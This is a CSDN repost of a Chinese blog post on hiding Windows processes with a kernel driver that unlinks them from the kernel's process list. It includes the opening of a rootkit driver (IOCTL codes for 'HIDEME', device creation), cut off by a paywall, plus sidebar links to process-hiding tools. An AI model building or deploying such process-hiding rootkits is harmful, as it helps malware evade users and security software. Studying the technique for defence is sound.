内核学习--驱动隐藏进程

最新推荐文章于 2024-05-20 10:23:39 发布
最新推荐文章于 2024-05-20 10:23:39 发布
阅读量339 收藏 3
点赞数
文章标签: 数据结构与算法
原文链接:http://www.cnblogs.com/herso/archive/2009/03/22/1419192.html
版权
本文介绍了通过修改Windows系统内核链表隐藏进程的原理,指出这种方法在现代杀毒软件面前效果有限。由于需要在Ring0层操作,通常应用程序无法实现,必须编写驱动程序。分享了一个不稳定且适用于XP SP3的驱动代码示例,警告可能在其他系统上导致蓝屏。
摘要由CSDN通过智能技术生成

实在不好意思拿出手,都是人家玩烂的技术了。。。可我还是要学习。。。也给小白们科普了 

原理:

windows系统内核内部采用链表的方式将进程链起来。如果我们从链表中摘掉想要隐藏的进程,那么一般的采用这种方式遍历进程的工具也就没有用处了。。也就达到我们的目的了。。悲哀的任务管理器。。。具体的就不记录了。。。(但是这种方法对现在的杀毒基本不起什么作用。。除了一些弱智杀毒软件。。。)

对内核数据结构的操作需要工作在Cpu的Ring0层,一般的应用程序也就没什么用武之地了 。。只有采用驱动的方式进行。。。nb的驱动。。邪恶的驱动。。。

下面自己的写的驱动代码。。不是很稳定。。。windows xp sp3下能正常运行,其他的系统没有测试。。估计要蓝屏 因为里面有HardCode。。 蓝屏不要拍我啊 。。。

 

ContractedBlock.gif ExpandedBlockStart.gif Code
  1 
  2 #include "ntddk.h"
  3 #include "stdio.h"
  4 #include "stdlib.h"
  5 typedef BOOLEAN BOOL;
  6 typedef unsigned long DWORD;
  7 typedef DWORD * PDWORD;
  8 
  9 #define FILE_DEVICE_ROOTKIT      0x00002a7b
 10 
 11 #define IOCTL_ROOTKIT_INIT            (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 12 #define IOCTL_ROOTKIT_HIDEME          (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
 13 int FLINKOFFSET;   
 14 int PIDOFFSET; 
 15 PDEVICE_OBJECT g_RootkitDevice; 
 16 const WCHAR deviceLinkBuffer[]  = L"\\DosDevices\\Fr";
 17 const WCHAR deviceNameBuffer[]  = L"\\Device\\Fr";
 18 
 19 #define   DebugPrint        DbgPrint   
 20 
 21 
 22 NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
 23 
 24 NTSTATUS RootkitHide(IN PDEVICE_OBJECT, IN PIRP);
 25 
 26 NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
 27 
 28 long    FindEproc( long pID );
 29 
 30 
 31 NTSTATUS DriverEntry(
 32                    IN PDRIVER_OBJECT  DriverObject,
 33                    IN PUNICODE_STRING RegistryPath
 34                     )
 35 {
 36     
 37     NTSTATUS                ntStatus;
 38     UNICODE_STRING          deviceNameUnicodeString;
 39     UNICODE_STRING          deviceLinkUnicodeString;        
 40     RtlInitUnicodeString (&deviceNameUnicodeString,
 41                           deviceNameBuffer );
 42     RtlInitUnicodeString (&deviceLinkUnicodeString,
 43                           deviceLinkBuffer );
 44 
 45     ntStatus = IoCreateDevice ( DriverObject,
 46                                 0// For driver extension
 47                                 &deviceNameUnicodeString,
 48                                 FILE_DEVICE_ROOTKIT,
 49                                 0,
 50                                 TRUE,
 51                                 &g_RootkitDevice );
 52 
 53     
最低0.47元/天 解锁文章
weixin_34080903
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
驱动签名 隐藏进程 保护进程 多种方式 保护进程驱动
05-18
多种方法 保护进程 断链 修改Flag hook对象 抹psp表 csscs表 注册回调 ObRegisterCallbacks
[Windows 驱动开发] 隐藏进程内存
LYSM
09-01 1595
原理 在进程的 _EPROCESS 中有一个 _RTL_AVL_TREE 类型的 VadRoot 成员,它是一个存放进程内存块的二叉树结构,如果我们找到了这个二叉树中我们想要隐藏的内存,直接将这个内存在二叉树中 “抹去”(其实是让上一个节点的 EndingVpn 指向下个节点的 EndingVpn ,让两个节点融合) 就可以达到隐藏的效果。 过程 比如你在代码中申请了两块内存: int main() { LPVOID p1 = VirtualAlloc(NULL, 0x10000, MEM_CO
驱动级!进程隐藏-按键精灵过检】驱动级,内核进程隐藏进程保护。实战效果演示,免费分享。
最新发布
luoqiaoliang的博客
05-20 1882
废话不多说,干货直接上! 免费的驱动进程隐藏工具分享,还不赶紧带上你的赞和关注白嫖一波吗?
驱动隐藏进程
10-17
驱动级,对进程隐藏,需要的朋友,可以下载使用。
驱动层SSDT 隐藏进程
ShadowAssassin的专栏
11-27 6489
闲着没事,便想在熟悉下之前看过的驱动编程相关知识,于是就写了这个简单的驱动隐藏进程程序。 要点:  在驱动隐藏,主要还是使用SSDT挂钩的方法,相关知识,可以到网上查找,在隐藏进程时,为了能够隐藏多个进程,在内核代码中创建一个链表,结构如下: //存放要隐藏进程的名字链表 typedef struct _ProcNameLink { UNICODE_STRING ProcName; s
易语言-易语言驱动隐藏进程
06-25
在易语言中,“驱动隐藏进程”是一个高级技术主题,通常涉及到系统底层操作和进程管理。 在Windows操作系统中,驱动程序是操作系统与硬件设备之间的桥梁,它们运行在内核模式下,具有较高的权限。而隐藏进程则是指...
易语言驱动隐藏进程源码-易语言
06-12
易语言驱动隐藏进程源码
进程隐藏工具--内核驱动实现
12-21
这里提到的"进程隐藏工具--内核驱动实现"是一个专为此目的设计的程序。通过内核驱动来实现进程隐藏,意味着该工具深入到了操作系统的最核心部分,具有很高的权限和控制能力。 首先,我们来理解一下进程隐藏的基本...
驱动保护进程_隐藏进程_遍历内核句柄
07-02
1、改进程PID,隐藏自己的进程 2、断链隐藏自己的进程,防PG 3、设置R3层的访问权限 4、保护指定进程的内存权限 5、遍历进程的句柄,并降低指定进程PID的句柄权限,里面有遍历内存进程和每个进程句柄的方法 6、操作...
Windows内核驱动EPROCESS遍历进程模块
12-14
"EPROCESS遍历进程模块"这个主题涉及到的是如何在内核驱动中获取并遍历当前系统中所有进程的加载模块信息。EPROCESS结构体在Windows内核中代表一个进程,而模块则是进程执行时加载的动态链接库(DLL)或其他可执行...
驱动隐藏进程和文件
09-21
强大的驱动进程隐藏技术,有应用层的相关调用以及GUI,是学习驱动程序的好资料
驱动级别隐藏进程源代码
06-09
之前在csdn下载的代码,修改了其中的两个bug:1、在有些机器上运行时蓝屏。2、存在内核内存的泄露(通常半天时间后就会死机或自动重启)。 这个是没有完全改好的:( 自己不能编辑资源,所以又上传了一个(驱动级别隐藏进程源代码2)
驱动进程保护 隐藏 注入
08-04
驱动进程保护 隐藏 注入 W7 W8 W10 32 64位都支持 不蓝屏
驱动隐藏进程(易语言).e
02-15
驱动隐藏进程
64位驱动隐藏进程与保护进程.e
08-18
64位驱动隐藏进程与保护进程.e
驱动隐藏进程
kktlxd的专栏
06-01 2830
FU_rootkit中有很多功能,先看了隐藏进程,,和以前在群里讨论的一样,windows调度的是线程,所以可以把要隐藏进程进程链中去掉,并不影响进程中的线程的调度和运行. FU_rootkit中的方法是先通过PsGetCurrentProcess(),(PsGetCurrentProcess returns a pointer to the process of the current
[驱动] 隐藏进程 驱动级 摘链 任务管理器看不到
Sprite雪碧
11-27 1495
闲着蛋疼写来玩玩练练手没啥技术含量只是个简单的摘链任务管理器看不到 测试环境 Win7 x86 typedef struct { DWORD_PTR EProcess; UCHAR* ImageName; ULONG ProcessID; }_Process_Info; NTSTATUS HideProcess() { DWORD_PTR CurrentEProcess...
驱动隐藏进程(eprocess断链)
qq_43147121的博客
10-01 849
具体的原理就不详细描述了,这种办法是最为基础的隐藏手段而且网上有很多文章,只不过我看了一些大部分都只是直接在driverEntry中写死的那种,所以我简单写了个三环0环交互的驱动代码供大家参考。进程内核中存在一个双向链表将所有的活动进程串联起来,今天写的就是将我们的目标进程从这个链表中移除以达到隐藏进程的目的。
嵌入式Linux内核驱动开发详解
对于想要从事或正在从事Linux内核驱动开发的工程师来说,这些知识点提供了基础的学习路径和理解框架。了解这些知识后,开发者可以更好地设计和实现设备驱动,从而充分发挥硬件性能,并使系统稳定高效地运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值